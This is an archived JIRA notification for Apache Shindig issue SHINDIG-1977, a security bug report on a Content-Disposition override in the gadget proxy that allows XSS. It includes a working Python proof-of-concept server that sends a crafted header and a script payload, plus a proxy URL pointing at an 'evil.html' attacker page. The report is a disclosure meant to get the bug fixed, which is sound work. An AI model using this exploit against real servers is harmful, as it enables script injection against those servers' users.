shindig-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "federico lanusse (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (SHINDIG-1977) Content-Disposition overrides leads to XSS vector
Date Mon, 26 May 2014 20:34:01 GMT

     [ https://issues.apache.org/jira/browse/SHINDIG-1977?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

federico lanusse updated SHINDIG-1977:
--------------------------------------

    Attachment: shindig_poc_01.PNG

> Content-Disposition overrides leads to XSS vector
> -------------------------------------------------
>
>                 Key: SHINDIG-1977
>                 URL: https://issues.apache.org/jira/browse/SHINDIG-1977
>             Project: Shindig
>          Issue Type: Bug
>          Components: Java
>    Affects Versions: 2.5.2
>            Reporter: federico lanusse
>            Priority: Critical
>              Labels: security
>         Attachments: shindig_POC_server.py, shindig_poc.PNG, shindig_poc_01.PNG
>
>
> While I was trying to figure why swf files are render as is instead of force download
I found this code in the last repo
> org.apache.shindig.gadgets.servlet.ProxyHandler#setResponseContentHeaders
> {code}
> if (StringUtils.isBlank(contentDispositionValue)
>               || contentDispositionValue.indexOf("attachment;") == -1
>               || contentDispositionValue.indexOf("filename") == -1) \{
>         response.setHeader("Content-Disposition", "attachment;filename=p.txt");
>       } else \{
>         response.setHeader("Content-Disposition", contentDispositionValue);
>       }
> {code}
> Is possible to break the Content-Disposition header if we set it to something like this:
*"Content-Disposition: inline;attachment;filename=a.html"*
> If an attacker creates a server and then redirect user to the shindig proxy in the target
server, is possible to render the html as is instead of a safe download.
> bq. http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
> I had only check this in the dev version, not sure if it out in the wild.
> Acceptance Test:
> # Run the shinding server (per. http://shindig.apache.org/documentation_building_java.html):
mvn -Prun
> # Run a server that add the "Content-Disposition: inline;attachment;filename=a.html"
in the response headers (PoC at the end)
> # Browse to http://localhost:8080/gadgets/proxy?container=default&refresh=3600&url=http://127.0.0.1:8081/evil.html
> Verify that html or any other file are force to download
> ##########################################################
> server code python
> {code}
> #!/usr/bin/python
> import BaseHTTPServer, SimpleHTTPServer
> from urlparse import urlparse, parse_qs
> class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
>     def do_GET(self):
>         print(self.headers)
>         self.send_response(200)
>         self.send_header("Content-Type", "text/html")
>         self.send_header("Content-Disposition", "inline;attachment;filename=a.html")
>         self.end_headers()
>         self.wfile.write("<!DOCTYPE html><html>  <head>    <title>This
is a title</title>  <script>alert(document.location)</script></head>
 <body>    <p>Hello world!</p>  </body></html>")
> try:
>         httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 8081), MyHandler)
>         httpd.serve_forever()
> except KeyboardInterrupt:
>     print('^C received, shutting down server')
>     httpd.socket.close()
> {code}
> img:http://k38.kn3.net/08474FFAC.png
> !http://k38.kn3.net/08474FFAC.png!



--
This message was sent by Atlassian JIRA
(v6.2#6252)

Mime
View raw message